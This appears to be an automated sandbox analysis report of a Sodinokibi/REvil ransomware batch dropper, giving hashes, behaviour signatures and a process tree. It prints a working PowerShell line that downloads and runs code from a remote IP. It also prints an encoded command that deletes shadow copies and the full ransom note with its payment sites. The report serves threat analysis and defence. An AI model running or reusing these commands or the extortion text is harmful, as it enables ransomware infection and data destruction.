Overview

overview

10

Static

static

Dt35j2GH.bat

windows7_x64

10

Dt35j2GH.bat

windows10_x64

10

Analysis

  • max time kernel
    138s
  • max time network
    129s
  • platform
    windows7_x64
  • resource
    win7v200217
  • submitted
    25-03-2020 01:10

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Dt35j2GH.bat

  • Size

    194B

  • MD5

    1d03256dd605ecc28c8d56afd64e6de1

  • SHA1

    16112901ee26827bf7fe72ce49405556b3b6ed3c

  • SHA256

    c29bb05f17fa7ccd0468b3f9c2ecf1e1f2298cf15b7281c2f9de2396fcedaf4c

  • SHA512

    14f5dbfd28cd36ad309dff3b1714ba35a8e86e749e165860b9cdf0fb966813465eb153041fa34a6dbc4b5b85f69056433372beb52e80f97f3bb766b0da7a6cf5

Score
10/10
ransomwareevasionspywaretrojansodinokibipersistence

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/Dt35j2GH

Extracted

Path

C:\ozo9948-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension ozo9948. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/F0B8CCFF63C65410 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/F0B8CCFF63C65410 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: L55LSwNMXroC8Zp89zqP/Pqf2Cnjs0KzpnwpcO3T56A3+EZGXQ0DhryDCw4qi0Rb nXnwQibAJyzXPK/b1GRAfMxaDjyA+kprofecXUOFQSkGJK/3cwnJciy0PIhrASoi Cgdq7RHCfVUbP7vvYB9cc3G7YOi3yxvf+6xjInTbeB0QYu02mv6t4EI+pxZ+/5nY lKheTiQpLxsxvejQqTFErt+y+n49qN2/GPEfdhUXWR9OUJFR+6EgfaVB9LAWZbRy XICgdtcqfwFCbYrPqm1ZxssaoO/kZ4vAgHD6WiZm+vCKT8U+aQHUrrwyCBqcJM7R Lg4UVQt+9DhnDqeHk0O//plvXwR04cC6s902xGcAvpfi9cMZ+WO7Pycl3GlY4tDr 2tDZXqVoe5G5+qZWBY+Edf8h/iifBvotA4iCo8glmxkF8o28bIGySMz5JEbZc5Mx KbTR2CDx+EWFkId8We+n69k0jw2VD6VLizhi0Jc6PC0XVV4u7oZBMv7wbD7yseCt 2Tq3ziQuzbWsZv4J4VULIiaETPeA3rclNIIVDqVpjphxlv9rKiseek6rH2kZziXd bA30Zbbsaoj2G3k6va8KrTwHLtLCXX+RlNVWciOZwYQ1KCAdM4yBcPXoRIy4d5Sd B9JUmBk3CauSLybxKl/9lzD7nK8TA71B/lCgiEwiemQVgDjyviJSeR4IXwnZ+CKN oQlo/2eAuLOd0Qrzq5txOmJJnDHMMuKs7/k923FPUbhUQ1Mo0f6IvdaG42PBZDVE +SdYTsl3VfgMQEdWHrQSMtfdq7jxM1qExDoQ4ehiDyIUSzAV/ASL1jnZco8KReJ5 FirnQtf7KbdfhFsN4mpToRinlr2DOwouwyFa3znf8W6OnyCzeugzfMsm2upvjdE9 k58vhGGj92ZeZW9YX+43d8yI5bVKpBzejhTWjQTZUrRnJA43tzqQex3UiGZ05G+s ZiraeOEY89dE1AkIYWvCDvYLIxfd12HXVxoi4Xo19bnv2bKdMDvh4Znhtch92p7b dzH7xpPuj4B4IHqF6HNoRyj9rKwPMgWBqykWl8oAXcu1ElfnOWoGWebJv1B9hl0e zGBb07PwaRMIA25AivBJCmWcoQJcinvDbnT5A4dKp9Nmv5ZKm2vz2T+Bo9Vfxy9Y L39l+/gRX8XDajeahoIO/4yGCsxMdb/AeM/tDpGVZzq5ZQdkwo7bk4J4BIZs0/g7 mhLtw5qg7NzIze1wqgjfPoFMEOAtifEpxcOonIAGCAqTJT2waFIgBb4rn+KqnbRN Q4hznA3mGDlpO9z4sVfb7OwKPDimBJKmYDf7tXdxfzsYFg== ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/F0B8CCFF63C65410

http://decryptor.cc/F0B8CCFF63C65410

Signatures

  • Drops file in Program Files directory 19 IoCs
  • Drops file in System32 directory 1 IoCs
  • Discovering connected drives 3 TTPs 7 IoCs
  • Modifies service 2 TTPs 4 IoCs
    persistence
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Blacklisted process makes network request 148 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Modifies system certificate store 2 TTPs 6 IoCs
    evasionspywaretrojan
  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

    ransomwaresodinokibi
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\Dt35j2GH.bat"
    1⤵
    • Discovering connected drives
    • Suspicious use of WriteProcessMemory
    PID:1848
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/Dt35j2GH');Invoke-FKSZQOWEIDH;Start-Sleep -s 10000"
      2⤵
      • Drops file in Program Files directory
      • Drops file in System32 directory
      • Discovering connected drives
      • Suspicious behavior: EnumeratesProcesses
      • Blacklisted process makes network request
      • Suspicious use of AdjustPrivilegeToken
      • Sets desktop wallpaper using registry
      • Modifies system certificate store
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious use of WriteProcessMemory
      PID:1872
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Discovering connected drives
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1972
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Modifies service
    • Suspicious use of AdjustPrivilegeToken
    PID:1404

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_266260b1-506b-46ee-8ffd-f74ade426d58
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_47931ed0-1f3a-4727-b467-1abba254408f
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_787e939b-6ce7-4022-b0df-f2cadaf1211f
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7b368953-2fc5-4e6c-ac0c-4e9ca5ec1dea
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9adcef47-d90e-41e7-bb27-93604e256a20
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_f66dfe3c-3c50-4c57-9265-ac0c7644a88d
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    Download Submit